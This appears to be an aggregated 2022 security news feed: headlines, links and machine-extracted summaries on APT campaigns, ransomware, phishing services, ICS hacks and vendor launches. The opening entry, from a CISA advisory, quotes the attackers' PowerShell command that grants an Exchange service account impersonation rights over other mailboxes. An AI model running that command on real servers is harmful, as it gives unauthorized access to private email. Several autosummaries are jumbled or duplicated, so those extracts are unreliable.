    Autosummary: The threat actors first used the service account to remotely access the organization’s Microsoft Exchange server via Outlook Web Access (OWA) from multiple external IP addresses; shortly afterwards, the actors assigned the Application Impersonation role to the service account by running the following PowerShell command for managing Exchange: powershell add-pssnapin *exchange*;New-ManagementRoleAssignment - name:"Journaling-Logs" -Role:ApplicationImpersonation -User:<account> This command gave the service account the ability to access other users’ mailboxes.For a downloadable copy of IOCs, see the following files: This joint Cybersecurity Advisory (CSA) provides APT actors tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) identified during the incident response activities by CISA and a third-party incident response organization. DETECTION Given the actors’ demonstrated capability to maintain persistent, long-term access in compromised enterprise environments, CISA, FBI, and NSA encourage organizations to: Monitor logs for connections from unusual VPSs and VPNs. In early March 2021, APT actors exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26868, and CVE-2021-27065 to install 17 China Chopper webshells on the Exchange Server.Monitor for the installation of unauthorized software, including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect).To detect use of compromised credentials in combination with a VPS, follow the steps below: Review logs for "impossible logins," such as logins with changing username, user agent strings, and IP address combinations or logins where IP addresses do not align to the expected user’s geographic location. including Remote Server Administration Tools (e.g., psexec, RdClient, VNC, and ScreenConnect). Table 1: Identified APT Enterprise ATT&CK Tactics and Techniques Initial Access Technique Title ID Use Valid Accounts T1078 Actors obtained and abused credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (e.g., inappropriate or unauthorized use of administrator accounts, service accounts, or third-party accounts). "

    ---

    AlphaSOC Analytics Engine identifies emerging threats in near real-time

    industry
    2022-10-03 https://www.helpnetsecurity.com/2022/10/03/alphasoc-analytics-engine/
    

    AlphaSOC announced its new AlphaSOC Analytics Engine (AE) solution, a differentiated cloud-native network traffic analysis (NTA) product that uniquely identifies compromised workloads across Amazon Web Services, Microsoft Azure, and Google Cloud Platform. Threat actors bypass existing controls by using novel command and control (C2) infrastructure that is not recognized by legacy security products. Data can also be exfiltrated from victim cloud environments via DNS tunneling, ICMP tunneling, and anonymizing circuit protocols (e.g., Tor, I2P, Freenet) … More →

    The post AlphaSOC Analytics Engine identifies emerging threats in near real-time appeared first on Help Net Security.

    "

    Autosummary: “With AlphaSOC AE we are moving the industry from reactive identification of known threats, such as a domain or IP address associated with a threat actor, towards proactive identification of threats, such as a compute instance beaconing to a newly registered domain which is unique to the customer environment and has suspicious properties,” said Chris McNab, CEO and co-founder, AlphaSOC. "

    ---

    Prison for ex-eBay staff who aggressively cyberstalked company’s critics with Craigslist sex party ads and funeral wreaths

    industry
    2022-09-30 https://www.bitdefender.com/blog/hotforsecurity/prison-for-ex-ebay-staff-who-aggressively-cyberstalked-companys-critics-with-craigslist-sex-party-ads-and-funeral-wreaths-2/
    Two men, who previously worked at eBay, have been sentenced to prison after admitting their role in a cyberstalking campaign that targeted the editor and publisher of a newsletter that criticised the company. Read more in my article on the Hot for Security blog. "

    Autosummary: The harassment campaign launched by the group of eBay employees included: sending anonymous, threatening messages delivering a funeral wreath, a mask of a bloody pig"s face, live insects, and a book on surviving the loss of a spouse sending pornography addressed to the Steiners, but delivered to their neighbours posting adverts for sex parties at the couple"s home on Craigslist traveling across the country to spy on the Steiners, and attempting to plant a GPS tracker on their car Fearing for their lives, the Steiners installed surveillance cameras to monitor anyone approaching their home. "

    ---

    Aunalytics Security Patching Platform protects users against system compromise

    industry
    2022-09-29 https://www.helpnetsecurity.com/2022/09/29/aunalytics-security-patching-platform/
    

    Aunalytics initiated its Security Patching Platform, Co-managed Patching as a Service to complement the company’s Advanced Security solution suite. Windows OS and supported 3rd party patch management allow for tighter security in the defense against cyberattacks and the new offering ensures active remediation. According to a 2022 Data Breach Investigations Report by Verizon, around 70 percent of successful cyberattacks exploited known vulnerabilities with available patches, making it important to update operating systems and applications regularly … More →

    The post Aunalytics Security Patching Platform protects users against system compromise appeared first on Help Net Security.

    "

    Autosummary: The platform facilitates collaboration between IT and security teams and includes the following capabilities: Inventory and performance management and proactive alerting Patch deployment control strategy, prioritization, planning Patch vetting and blacklisting intelligence Windows Operating System patch management Supported 3rd Party Patch Management Anti-Malware DNS-based Malware Protection Device Encryption Management Innovative management tool library “Security patch exploits can have extremely damaging effects on an organization, decreasing revenues or causing reputational damage, making it imperative to have security patching in place,” said Chris Nicholson, Vice President of Managed IT Services. "

    ---

    Embedded IoT security threats and challenges

    industry
    2022-09-29 https://www.helpnetsecurity.com/2022/09/29/embedded-iot-security-threats-challenges-video/
    

    IoT embedded systems combine hardware, firmware, and internet connectivity to carry out particular functions. These devices transfer real-time data via the internet for various purposes, including tracking, monitoring, and analysis. In this Help Net Security video, Hubertus Grobbel, VP of Security Solutions at Swissbit, discusses the insecurity of IoT devices and offers tips on how to secure them.

    The post Embedded IoT security threats and challenges appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Data security trends: 7 statistics you need to know

    industry
    2022-09-29 https://www.helpnetsecurity.com/2022/09/29/data-security-trends/
    

    U.S. businesses are at high risk for data security threats from increasingly effective phishing attempts and the lack of procedures to restrict data access, according to GetApp’s 4th Annual Data Security Report. Newer companies are especially vulnerable to security threats. This survey of IT security managers and employees reveals seven significant trends related to data security threats facing U.S. businesses: 1. Phishing emails are on the rise, and so are the employees clicking the links … More →

    The post Data security trends: 7 statistics you need to know appeared first on Help Net Security.

    "

    Autosummary: Phishing emails are on the rise, and so are the employees clicking the links This year, 89% of companies surveyed report receiving a phishing email, a jump from 77% who said the same in 2021. "

    ---

    TransUnion TruValidate Device Risk with Behavioral Analytics improves fraud detection for businesses

    industry
    2022-09-28 https://www.helpnetsecurity.com/2022/09/28/transunion-truvalidate-device-risk-with-behavioral-analytics/
    

    To help limit the more than $100 billion of global sales revenue lost to false positives during the fraud detection process, TransUnion launched TruValidate Device Risk with Behavioral Analytics. The solution is newly fortified by NeuroID’s behavioral analytics and aims to help businesses stop fraud – not good customers – based on device recognition, context, device and user behavior. The solution builds trusted connections by allowing users to join a global network of 6,000 fraud … More →

    The post TransUnion TruValidate Device Risk with Behavioral Analytics improves fraud detection for businesses appeared first on Help Net Security.

    "

    Autosummary: By analyzing this data in real-time, these products can help provide critical information as to whether a loan applicant’s intentions are genuine, or deceptive, without adding any additional friction to the process,” said Jason Laky, executive vice president and head of financial services at TransUnion. "

    ---

    GuidePoint Security releases ICS Security Services to address OT security challenges

    industry
    2022-09-28 https://www.helpnetsecurity.com/2022/09/29/guidepoint-security-ics-security-services/
    

    GuidePoint Security has released its ICS Security Services that include a Security Program Review, Security Architecture Review and ICS Penetration Testing that collectively are designed to provide an organization with a holistic view of their entire ICS security posture. Traditionally, Operational Technology (OT) environments were kept separate and isolated from the traditional IT infrastructure. Today, ICS environments have emerged from the combination of IT and OT (Industry 4.0), introducing new features and easier management, but … More →

    The post GuidePoint Security releases ICS Security Services to address OT security challenges appeared first on Help Net Security.

    "

    Autosummary: GuidePoint’s ICS Security Service offerings include: Security Program Review (SPR): The SPR evaluates and measures an organization’s security program maturity and is based on the framework chosen by the customer, including, but not limited to: NIST Cybersecurity Framework (CSF), NIST 800 82, CIS Controls, ISO/IEC 62443, ISO 27001, C2M2, FERC/NERC-CIP, CISA TSS and ITU CIIP. "

    ---

    Exmatter exfiltration tool used to implement new extortion tactics

    industry
    2022-09-26 https://securityaffairs.co/wordpress/136226/cyber-crime/exmatter-tool-shift-extortion-tactics.html
    

    Ransomware operators switch to new extortion tactics by using the Exmatter malware and adding new data corruption functionality. The data extortion landscape is constantly evolving and threat actors are devising new extortion techniques, this is the case of threat actors using the Exmatter malware. Cyderes Special Operations and Stairwell Threat Research researchers spotted a sample […]

    The post Exmatter exfiltration tool used to implement new extortion tactics appeared first on Security Affairs.

    "

    Autosummary: Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "

    ---

    Ransomware data theft tool may show a shift in extortion tactics

    exploits industry
    2022-09-25 https://www.bleepingcomputer.com/news/security/ransomware-data-theft-tool-may-show-a-shift-in-extortion-tactics/
    Data exfiltration malware known as Exmatter and previously linked with the BlackMatter ransomware group is now being upgraded with data corruption functionality that may indicate a new tactic that ransomware affiliates might switch to in the future. [...] "

    Autosummary: Many ransomware operations run as a Ransomware-as-a-Service, where operators/developers are in charge of developing the ransomware, payment site, and handling negotiations, while affiliates join to breach corporate networks, steal data, delete backups, and encrypt devices. "

    ---

    Void Balaur Hackers-for-Hire Targeting Russian Businesses and Politics Entities

    industry
    2022-09-23 https://thehackernews.com/2022/09/void-balaur-hackers-for-hire-group-now.html
    A hack-for-hire group that was first exposed in 2019 has expanded its focus to set its sights on entities with business or political ties to Russia. Dubbed Void Balaur, the cyber mercenary collective has a history of launching cyberattacks against biotechnology and telecom companies since 2015. As many as 3,500 victims have been reported as of November 2021. "Void Balaur [...] primarily dabbles "

    Autosummary: "Void Balaur also goes after targets valuable for prepositioning or facilitating future attacks, SentinelOne researcher Tom Hegel said, adding the targets span Russia, the U.S., the U.K., Taiwan, Brazil, Kazakhstan, Ukraine, Moldova, Georgia, Spain, Central African Republic, and Sudan. "

    ---

    NSA shares guidance to help secure OT/ICS critical infrastructure

    industry
    2022-09-22 https://www.bleepingcomputer.com/news/security/nsa-shares-guidance-to-help-secure-ot-ics-critical-infrastructure/
    The National Security Agency (NSA) and CISA have issued guidance on how to secure operational technology (OT) and industrial control systems (ICSs) part of U.S. critical infrastructure. [...] "

    Autosummary: In January, the FBI, CISA, and NSA issued a similar joint advisory, exposing multiple Russian threat groups (including APT29, APT28, and the Sandworm Team) targeting US critical infrastructure organizations." In today"s advisory [PDF], you can find detailed information on how to block threat actors" attacks at every step, including attempts to collect intelligence, gain initial access, or deploy and execute malicious tools in compromised critical infrastructure systems. "

    ---

    Phosphorus and Dewpoint collaborate to deliver a new generation of xIoT security solutions

    industry
    2022-09-22 https://www.helpnetsecurity.com/2022/09/23/phosphorus-dewpoint/
    

    Phosphorus has announced a partnership with Dewpoint. The IT and security solutions provider will act as a value-added reseller (VAR) for Phosphorus in the US market. The new partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the US to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “xIoT security is a critical need for today’s enterprises, and these risks are left unaddressed by … More →

    The post Phosphorus and Dewpoint collaborate to deliver a new generation of xIoT security solutions appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    ThreatQ TDR Orchestrator addresses industry needs for simpler implementation

    industry
    2022-09-21 https://www.helpnetsecurity.com/2022/09/21/threatquotient-tdr-orchestrator/
    

    ThreatQuotient has released a new version of ThreatQ TDR Orchestrator, the solution for a simplified, data-driven approach to security operations. Built on the ThreatQ Platform, the continued innovation of ThreatQ TDR Orchestrator includes enhanced automation, analysis and reporting capabilities that accelerate threat detection and response across disparate systems. The latest research from ThreatQuotient, planned for full release later in 2022, shows signs that adoption of security automation is advancing, as budgets in this area are … More →

    The post ThreatQ TDR Orchestrator addresses industry needs for simpler implementation appeared first on Help Net Security.

    "

    Autosummary: Atomic Automation allows for immediate action when a complex response is not needed; and Automation Packs for vulnerability prioritization, indicator enrichment, XDR, and more use cases coming soon, help users get started with common use cases quickly. "

    ---

    Energy bill rebate scams spread via SMS and email

    financial industry
    2022-09-21 https://grahamcluley.com/energy-bill-rebate-scams-spread-via-sms-and-email/
    The UK’s National Cyber Security Centre (NCSC) has warned that fraudsters are sending out emails and SMS texts urging homeowners to sign up for a discount on their energy bills. "

    Autosummary: "

    ---

    Scammers send fake "Energy Bills Support Scheme" texts

    financial industry
    2022-09-21 https://www.malwarebytes.com/blog/news/2022/09/energy-scammers-send-fake-energy-bills-support-scheme-texts
    

    Categories: News Tags: scam Tags: phish Tags: SMS Tags: energy Tags: fake Tags: website Tags: £400 Watch out for an energy-themed scam being sent out via SMS which plays on energy price fears. (Read more...)

    The post Scammers send fake "Energy Bills Support Scheme" texts appeared first on Malwarebytes Labs.

    "

    Autosummary: First it asks potential victims to enter a variety of personal information: Name Date of birth Phone number Address City Postcode Once this is done, the site asks for your current energy supplier, and provides a list of pre-fills. Card security code It also places the logo of whichever company you’ve selected at the top of the page, along with the following message: This should be the account linked to your [business name] account. "

    ---

    Phosphorus and EverSec Group collaboration expands xIoT security throughout the US

    industry
    2022-09-18 https://www.helpnetsecurity.com/2022/09/19/phosphorus-eversec-group/
    

    Phosphorus has joined forces with EverSec Group. The cybersecurity solutions provider and security advisor to many of the world’s largest brand names will act as a value-added reseller (VAR) for Phosphorus in the U.S. market. The new partnership will see the two companies jointly delivering a new generation of xIoT security solutions in the U.S. to meet growing enterprise demand for xIoT attack surface management and remediation capabilities. “This exciting collaboration with a proven solution … More →

    The post Phosphorus and EverSec Group collaboration expands xIoT security throughout the US appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Daon IdentityX voice biometrics now available on Genesys’ Cloud CX platform

    industry
    2022-09-14 https://www.helpnetsecurity.com/2022/09/14/daon-identityx/
    

    Daon has announced the availability of IdentityX voice biometrics on the Genesys AppFoundry. Leveraging the Genesys AudioHook API, the new integration delivers identity verification and proofing, mitigates fraudulent account-take-over (ATO) and increases the speed of customers moving through their desired workflows. This connectivity to Daon IdentityX is easy for Genesys customers to implement, and runs seamlessly in the background. This solution addresses a growing need among businesses: In 2021, incidents of fraud cost Americans $25 … More →

    The post Daon IdentityX voice biometrics now available on Genesys’ Cloud CX platform appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Keysight unveils automotive test solution for mobile industry processor interface

    industry
    2022-09-14 https://www.helpnetsecurity.com/2022/09/14/keysight-automotive-test-solution/
    

    Keysight Technologies has released a new automotive serializer/deserializer (SerDes) receiver (Rx) compliance test solution to verify mobile industry processor interface (MIPI) A-PHY devices based on the Compliance Test Specification (CTS) requirements. This solution was developed in collaboration with BitifEye Digital Test Solutions and Wilder Technologies, with the support of Valens Semiconductor. Silicon vendors are planning to implement MIPI A-PHY, a long-reach physical layer interface for automotive and other surround-sensor applications, including cameras and in-vehicle infotainment … More →

    The post Keysight unveils automotive test solution for mobile industry processor interface appeared first on Help Net Security.

    "

    Autosummary: “Our customers will benefit from testing solutions that enable device makers of new automotive in-vehicle networks, either standardized or accepted, to become global standards for automotive high-speed data transmission.”, Henaut continued. "

    ---

    Securing your IoT devices against cyber attacks in 5 steps

    industry
    2022-09-14 https://www.bleepingcomputer.com/news/security/securing-your-iot-devices-against-cyber-attacks-in-5-steps/
    How is IoT being used in the enterprise, and how can it be secured? We will demonstrate important security best practices and how a secure password policy is paramount to the security of devices. [...] "

    Autosummary: Today, modern IoT systems include a combination of the following: Wireless networks – Wireless networks are the connectivity platform for IoT systems and enable IoT smart devices and sensors to be placed anywhere wireless networks can reach Cloud or private data center database locations – Cloud or private data center database locations store the mass of information and telemetry data generated, captured, and communicated by the IoT device Hardware sensors – Hardware sensors collect data from a wide range of systems depending on the device, the use case, and other aspects Smart devices – Smart devices are traditionally "dumb" devices that perform various tasks that now have embedded intelligent sensors and now have the capability to connect to wireless networks for transmitting the data collected Compute engines – Compute engines serve the purpose of analyzing and providing intelligent insights from the raw data collected from IoT devices and hardware sensors IoT security implications While IoT is an amazingly powerful technology that organizations can benefit from, businesses do well to consider the security implications of IoT as this relates to their overall security posture. Businesses realize the benefits and value coming from IoT devices, including: Businesses can improve productivity and efficiency with the insights gained from IoT-connected devices Companies can collect data-driven insights to help make businesses decisions It helps businesses realize the full potential of their revenue streams and develop new revenue models It allows easily connecting the physical world with the digital world, which helps to drive innovation, agility, efficiency, and new understandings of data models IoT devices work hand-in-hand with modern machine-learning algorithms allowing the mass of collected data to be analyzed very quickly, allowing businesses to extrapolate intelligent business insights. In general, IoT refers to devices with embedded software, sensors, network connectivity, and other technologies, allowing them to exchange data with other devices connected to the Internet. Internet of Things (IoT) devices are connecting the physical world with the digital With the prevalence of broadband network connectivity, wireless networks, and now 5G mobile networks in remote locations, it is now possible to connect any device to the network, including IoT devices. "

    ---

    Forescout and First Health Advisory partner to help organizations mitigate IT, IoT, OT, and IoMT risks

    industry
    2022-09-14 https://www.helpnetsecurity.com/2022/09/15/forescout-first-health-advisory/
    

    Forescout Technologies and First Health Advisory partnership creates an approach to connected asset risk management by automating the technical data collection, mitigation and risk reduction measures for a healthcare organization’s entire network that encompasses IT, IoT, OT, and IoMT assets. Healthcare organizations’ networks are under constant attack and often do not have the necessary human capital to oversee the work necessary to thwart a potential threat or attack through quick response. This challenge places added … More →

    The post Forescout and First Health Advisory partner to help organizations mitigate IT, IoT, OT, and IoMT risks appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel

    industry
    2022-09-13 https://securityaffairs.co/wordpress/135656/hacktivism/ghostsec-hacked-berghof-plcs-israel.html
    

    The hacktivist collective GhostSec claimed to have compromised 55 Berghof PLCs used by Israeli organizations. Pro-Palestinian Hacking Group GhostSec claimed to have compromised 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations as part of a Free Palestine campaign. On September, 4th, 2022, GhostSec announced on social media and its Telegram channel that it has compromised […]

    The post Pro-Palestinian group GhostSec hacked Berghof PLCs in Israel appeared first on Security Affairs.

    "

    Autosummary: “In the message it published, GhostSec attached a video demonstrating a successful log-in to the PLC’s admin panel, together with an image of an HMI screen showing its current state and control of the PLC process, and another image showing that the PLC had been stopped. "

    ---

    Palestinian Hacktivist Group GhostSec Compromises 55 Berghof PLCs Across Israel

    industry
    2022-09-12 https://thehackernews.com/2022/09/palestinian-hacktivist-group-ghostsec.html
    A hacktivist collective called GhostSec has claimed credit for compromising as many as 55 Berghof programmable logic controllers (PLCs) used by Israeli organizations as part of a "Free Palestine" campaign. Industrial cybersecurity firm OTORIO, which dug deeper into the incident, said the breach was made possible owing to the fact that the PLCs were accessible through the Internet and were "

    Autosummary: The attacks against Israeli targets, dubbed "#OpIsrael," is said to have commenced on June 28, 2022, citing "continuous attacks from Israel towards Palestinians. "

    ---

    CyberLink and MediaTek join forces to provide AI solution for facial recognition AIoT apps

    industry
    2022-09-10 https://www.helpnetsecurity.com/2022/09/11/cyberlink-mediatek/
    

    CyberLink has integrated its AI facial recognition engine, FaceMe, in MediaTek’s new AIoT platform, Genio. The pairing of FaceMe’s engine with the Genio platform gives the market an AI solution for facial recognition AIoT applications. Edge computing for facial recognition with low latency CyberLink’s cross-platform AI facial recognition engine, FaceMe already supports numerous operating systems and is optimized for IoT and AIoT platforms. With the recent MediaTek’s Genio 1200 integration, FaceMe further provides IoT/AIoT developers … More →

    The post CyberLink and MediaTek join forces to provide AI solution for facial recognition AIoT apps appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    North Korean Lazarus hackers take aim at U.S. energy providers

    industry
    2022-09-08 https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-take-aim-at-us-energy-providers/
    The North Korean APT group "Lazarus" (APT38) is exploiting VMWare Horizon servers to access the corporate networks of energy providers in the United States, Canada, and Japan. [...] "

    Autosummary: This diversification in attacks is illustrated in the Lazarus hacker"s wide range of attacks, including their targeting of IT job seekers, the creation of fake cryptocurrency trading apps, the creation of trojanized development tools, the use of ransomware as decoys, and the massive $620 million theft of cryptocurrency theft from the Ronin bridge. "

    ---

    North Korean Lazarus Hackers Targeting Energy Providers Around the World

    industry
    2022-09-08 https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html
    A malicious campaign mounted by the North Korea-linked Lazarus Group is targeting energy providers around the world, including those based in the United States, Canada, and Japan. “The campaign is meant to infiltrate organizations around the world for establishing long-term access and subsequently exfiltrating data of interest to the adversary’s nation-state,” Cisco Talos said in a report shared "

    Autosummary: "

    ---

    North Korea-linked Lazarus APT targets energy providers around the world

    industry
    2022-09-08 https://securityaffairs.co/wordpress/135469/apt/north-korea-linked-lazarus-apt-targets-energy-providers-around-the-world.html
    

    North Korea-linked Lazarus APT group is targeting energy providers around the world, including organizations in the US, Canada, and Japan. Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. The campaign was observed between February and July 2022.  The attacks […]

    The post North Korea-linked Lazarus APT targets energy providers around the world appeared first on Security Affairs.

    "

    Autosummary: Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. "

    ---

    Toys behaving badly: How parents can protect their family from IoT threats

    industry
    2022-09-08 https://www.welivesecurity.com/2022/09/08/toys-behaving-badly-how-parents-protect-family-iot-threats/
    

    It pays to do some research before taking a leap into the world of internet-connected toys

    The post Toys behaving badly: How parents can protect their family from IoT threats appeared first on WeLiveSecurity

    "

    Autosummary: This could include features like: Microphones and cameras that receive video and audio from the child Speakers and screens to relay audio and video back to the child Bluetooth to link the toy up to a connected app Internet connectivity to the home Wi-Fi router With this kind of technology, smart toys can go beyond the inanimate playthings most of us grew up with. How to mitigate the privacy and security risks of smart toys With smart toys representing a certain degree of security and privacy risks, consider the following best practice advice to counter the threats: Do your research before buying: Check if there’s been negative publicity or research done on the model’s security and privacy credentials. Attackers could theoretically hijack a smart toy with audio capabilities to hack smart homes, by sending audio commands to a voice-activated system (i.e., “Alexa, open the front door”). "

    ---

    SymphonyAI Industrial KPI 360 allows manufacturers to view operational data through a single dashboard

    industry
    2022-09-07 https://www.helpnetsecurity.com/2022/09/07/symphonyai-industrial-kpi-360/
    

    SymphonyAI Industrial has launched KPI 360, an AI-driven solution that uses real-time data monitoring and prediction to help manufacturing companies view different operational data sources through a single, intelligence dashboard that sets up in hours. Backed by SymphonyAI’s Eureka industrial AI platform, KPI 360 lets any type of user set up monitoring for strategic KPIs through a visual, no-code builder interface. Leveraging SymphonyAI Industrial’s proprietary domain knowledge engine, KPI 360 comes with pre-built KPIs for … More →

    The post SymphonyAI Industrial KPI 360 allows manufacturers to view operational data through a single dashboard appeared first on Help Net Security.

    "

    Autosummary: Flexibility and extensibility are built into KPI 360, so our customers can choose the visualization of their choice, link it to one or more KPIs, configure interactions with the visualizations, and change the visual appearance without writing a single line of code.”, Gallello continued. "

    ---

    New Stealthy Shikitega Malware Targeting Linux Systems and IoT Devices

    exploits industry
    2022-09-07 https://thehackernews.com/2022/09/new-stealthy-shikitega-malware.html
    A new piece of stealthy Linux malware called Shikitega has been uncovered adopting a multi-stage infection chain to compromise endpoints and IoT devices and deposit additional payloads. "An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist," AT&T Alien Labs said in a new report published Tuesday. The findings add to a "

    Autosummary: "

    ---

    AkinovA’s clients can now benefit from CyberCube’s modeling and analytics

    industry
    2022-09-07 https://www.helpnetsecurity.com/2022/09/08/cybercube-akinova/
    

    CyberCube has partnered with AkinovA, to enable AkinovA’s clients to benefit from CyberCube’s modeling and analytics. The partnership will see CyberCube’s products made available to AkinovA’s platform. In doing so, the entire value chain of the risk transfer sector can gain access to CyberCube’s models. CyberCube’s models are based on cyber risk scenarios including ransomware attacks, cloud outages and major systemic risks to support the insurance, reinsurance and Insurance-Linked Securities (ILS) organisations to make better … More →

    The post AkinovA’s clients can now benefit from CyberCube’s modeling and analytics appeared first on Help Net Security.

    "

    Autosummary: Henri Winand, AkinovA CEO, commented: “In 2020, AkinovA pioneered first-of-a-kind Cloud outage and cyber-induced electricity power generation downtime risk transfers together with AkinovA ecosystem partners, including a leading broker and underwriting capital. "

    ---

    Ant Group supports industrial collaborations in the digital economy with more accessible AI

    industry
    2022-09-06 https://www.helpnetsecurity.com/2022/09/06/ant-group-three-initiatives/
    

    Ant Group has unveiled three initiatives to make trusted AI more accessible. This includes making its graph processing database TuGraph open source; launching an AI security testing platform; and a privacy-preserving computation open platform. Announced at the World Artificial Intelligence Conference (“WAIC”) in Shanghai, these actions aim to make trusted AI solutions more accessible to enable industrial multi-party collaborations in the digital economy. A growing number of industries have been adopting AI technology at a … More →

    The post Ant Group supports industrial collaborations in the digital economy with more accessible AI appeared first on Help Net Security.

    "

    Autosummary: “We believe that Privacy-Preserving Computation, Blockchain, Graph-Processing Technology, Distributed Database and Green Computing are the fundamental technologies for a large-scale industrial application of AI in the digital economy. "

    ---

    New EvilProxy service lets all hackers use advanced phishing tactics

    financial industry
    2022-09-05 https://www.bleepingcomputer.com/news/security/new-evilproxy-service-lets-all-hackers-use-advanced-phishing-tactics/
    A reverse-proxy Phishing-as-a-Service (PaaS) platform called EvilProxy has emerged, promising to steal authentication tokens to bypass multi-factor authentication (MFA) on Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy, and even PyPI. [...] "

    Autosummary: A reverse-proxy Phishing-as-a-Service (PaaS) platform called EvilProxy has emerged, promising to steal authentication tokens to bypass multi-factor authentication (MFA) on Apple, Google, Facebook, Microsoft, Twitter, GitHub, GoDaddy, and even PyPI. "

    ---

    BlackCat ransomware claims attack on Italian energy agency

    exploits ransomware industry
    2022-09-02 https://www.bleepingcomputer.com/news/security/blackcat-ransomware-claims-attack-on-italian-energy-agency/
    The BlackCat/ALPHV ransomware gang claimed responsibility for an attack that hit the systems of Italy"s energy agency Gestore dei Servizi Energetici SpA (GSE) over the weekend. [...] "

    Autosummary: The attackers say that the stolen files contain confidential data, including contracts, reports, project information, accounting documents, and other internal documentation. "

    ---

    Dealing with cyber threats in the energy sector: Are we on the right path?

    industry
    2022-09-01 https://www.helpnetsecurity.com/2022/09/01/cyber-threats-energy-sector/
    

    In this interview for Help Net Security, Katie Taitler, Senior Cybersecurity Strategista at Axonius, talks about cyber threats in the energy sector and what should be improved to make sure this sector is properly guarded. We have witnessed numerous cyberattacks on the energy sector in the past few years. What could be the consequences of such attacks? Attacks on the energy sector are often a show of power that are meant to cause large-scale disruption. … More →

    The post Dealing with cyber threats in the energy sector: Are we on the right path? appeared first on Help Net Security.

    "

    Autosummary: It always starts with the fundamentals and knowing your baselines: what technology do you have, where is it, what state is it in, how can it be attacked, what vulnerabilities might criminals take advantage of, can they be patched, what are the priorities?Energy organizations need to devote time and energy, and collaborate better with the private sector, to seek out research, best practices, and establish improved information sharing among organizations. "

    ---

    7 metrics to measure the effectiveness of your security operations

    industry
    2022-09-01 https://www.helpnetsecurity.com/2022/09/01/7-metrics-measure-effectiveness-security-operations-video/
    

    Given inflation and economic uncertainty, the cybersecurity industry is starting to experience budget cuts, despite a surge in ransomware attacks. As more budgets are going under the microscope, and in some cases, on the chopping block, one of the best ways for security leaders to protect their program is to ensure alignment with their executive teams and boards. In this Help Net Security video, Andrew Hollister, CSO at LogRhythm, talks about measuring the effectiveness of … More →

    The post 7 metrics to measure the effectiveness of your security operations appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Secureworks partners with Netskope and SCADAfence to protect users against threats

    industry
    2022-08-31 https://www.helpnetsecurity.com/2022/09/01/secureworks-netskope-scadafence/
    

    Secureworks announced the expansion of its alliances program into several new solution areas. With threats expanding into critical production environments and the service edge, detection capabilities must expand, too. Through two new partners, Netskope and SCADAfence, Secureworks widens the range of potential security vulnerabilities addressed by Secureworks Taegis XDR to include Secure Access Service Edge (SASE), Operational Technology (OT), and Industrial Control Systems (ICS). Now, more organizations than ever can benefit from better detection with … More →

    The post Secureworks partners with Netskope and SCADAfence to protect users against threats appeared first on Help Net Security.

    "

    Autosummary: “Hybrid work is the new normal, and our customers look for complete SASE solutions to enable performance, deliver data, protect against threats, and maximize return-on-investment,” said Andy Horwitz, VP of Business Development at Netskope. "

    ---

    Threat actors breached the network of the Italian oil company ENI

    industry
    2022-08-31 https://securityaffairs.co/wordpress/135116/hacking/eni-suffered-cyberattack.html
    

    Italian oil giant Eni was hit by a cyber attack, attackers compromised its computer networks, but the consequences appear to be minor. Italian oil giant company Eni disclosed a security breach, threat actors gained access to its network, but according to the company the intrusion had minor consequences because it was quickly detected. “The internal […]

    The post Threat actors breached the network of the Italian oil company ENI appeared first on Security Affairs.

    "

    Autosummary: Last year, Alpharetta, Georgia-based Colonial Pipeline Co. shut the largest fuel pipeline in the US after a ransomware attack crippled its IT systems, and in February, Hamburg, Germany-based oil trader Mabanaft said it was the victim of a cyberattack that disrupted the delivery of fuels across Germany. "

    ---

    DDoS activity launched by patriotic hacktivists is on the rise

    industry
    2022-08-30 https://www.helpnetsecurity.com/2022/08/30/malicious-ddos-attacks-video/
    

    Radware released a report revealing that the number of malicious DDoS attacks climbed by 203% compared to the first six months of 2021. This Help Net Security video provides information about the rise of DDoS activity launched by patriotic hacktivists.

    The post DDoS activity launched by patriotic hacktivists is on the rise appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Rise in IoT vulnerability disclosures, up 57%

    exploits industry
    2022-08-29 https://www.helpnetsecurity.com/2022/08/29/vulnerability-disclosures-iot-devices/
    

    Vulnerability disclosures impacting IoT devices increased by 57% in the first half (1H) of 2022 compared to the previous six months, according to a research by Claroty. The report also found that over the same time period, vendor self-disclosures increased by 69%, becoming more prolific reporters than independent research outfits for the first time, and fully or partially remediated firmware vulnerabilities increased by 79%, a notable improvement given the relative challenges in patching firmware versus … More →

    The post Rise in IoT vulnerability disclosures, up 57% appeared first on Help Net Security.

    "

    Autosummary: Vendor self-disclosures: For the first time, vendor self-disclosures (29%) have surpassed independent research outfits (19%) as the second most prolific vulnerability reporters, after third-party security companies (45%). "

    ---

    Attackers changing targets from large hospitals to specialty clinics

    industry
    2022-08-29 https://www.helpnetsecurity.com/2022/08/29/data-breach-healthcare-organizations/
    

    Critical Insight announced the release of the firm’s H1 2022 Healthcare Data Breach Report, which analyzes ​​breach data reported to the United States Department of Health and Human Services by healthcare organizations. With the healthcare industry continuing to be a top attack vector for cybercriminals and ransomware threat groups, H1 2022 saw an interesting change in targets as attackers moved from large hospital systems and payers, big targets that would likely yield the most data … More →

    The post Attackers changing targets from large hospitals to specialty clinics appeared first on Help Net Security.

    "

